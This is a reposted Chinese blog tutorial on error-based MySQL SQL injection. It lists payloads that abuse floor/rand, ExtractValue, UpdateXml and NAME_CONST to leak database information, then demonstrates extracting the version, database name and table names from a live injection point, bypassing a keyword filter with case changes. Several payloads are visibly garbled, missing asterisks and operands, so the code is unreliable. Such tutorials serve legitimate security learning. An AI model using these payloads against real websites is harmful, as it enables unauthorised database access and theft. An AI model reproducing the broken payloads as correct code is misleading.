SQL注入之mysql显错注入

    在我们实际渗透中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只显示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过mysql函数报错来进行注入,另外如何使用手工进行全程注入的利用过程,如果你知道sqlmap里面有对应的脚本的话,烦请告知一下,谢谢!。

wKioL1mrZdiAlu2WAAHAigyM4E8873.jpg-wh_50

图1 获取数据库失败

    此时我们可以考虑下是否是显错注入,对于显错注入我们可以使用mysql显错注入函数进行查询数据库信息。

    通过floor报错:

1
and  select  from  ( select  count (*),concat(version(),floor(rand(0)*2))x  from  information_schema.tables  group  by  x)a)
1
and  ( select  count (*)  from  ( select  union  select  null  union  select   !1)x  group  by  concat(( select  version()),floor(rand(0)*2)))

    通过ExtractValue报错:

1
and  extractvalue(1, concat(0x7f, ( select  version()),0x7f))

    通过UpdateXml报错:

1
and  1=(updatexml(1,concat(0x7f,( select  version()),0x7f),1))

    通过NAME_CONST报错:

1
and  1=( select  from  ( select  NAME_CONST(version(),1),NAME_CONST(version(),1))  as  x)

    通过错误的双重查询:

1
or  group  by  concat_ws(0x7f,version(),floor(rand(0)*2))  having  min (0)  or  1

    在这里我们以UpdateXml报错进行实战演示,如图2是一个显错注入点。

wKioL1mrbU-C0a8RAACQAXA8D38440.jpg-wh_50

图2 显错注入点

    此时我们将通过UpdateXml来进行SQL注入,这里由于对关键字进行了过滤,因此我们需要使用大小写来进行绕过,首先我们查询数据库版本,如图3所示,成功获取了数据库版本。

wKioL1mrbkbjMtwoAAC9-K9ywNk540.jpg-wh_50

图3 获取数据库版本信息

    获取数据库名,如图4所示。

wKiom1mrcKGjroMaAAC42nt38yI886.jpg-wh_50

图4 获取数据名

    获取表名,如图5所示。

wKiom1mrcVKToMzTAAEBa6GYeo8084.jpg-wh_50

图5 获取表名

    后续操作请参考文章《mysql手工注入》,这里不再进行累赘!



本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/1962253

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值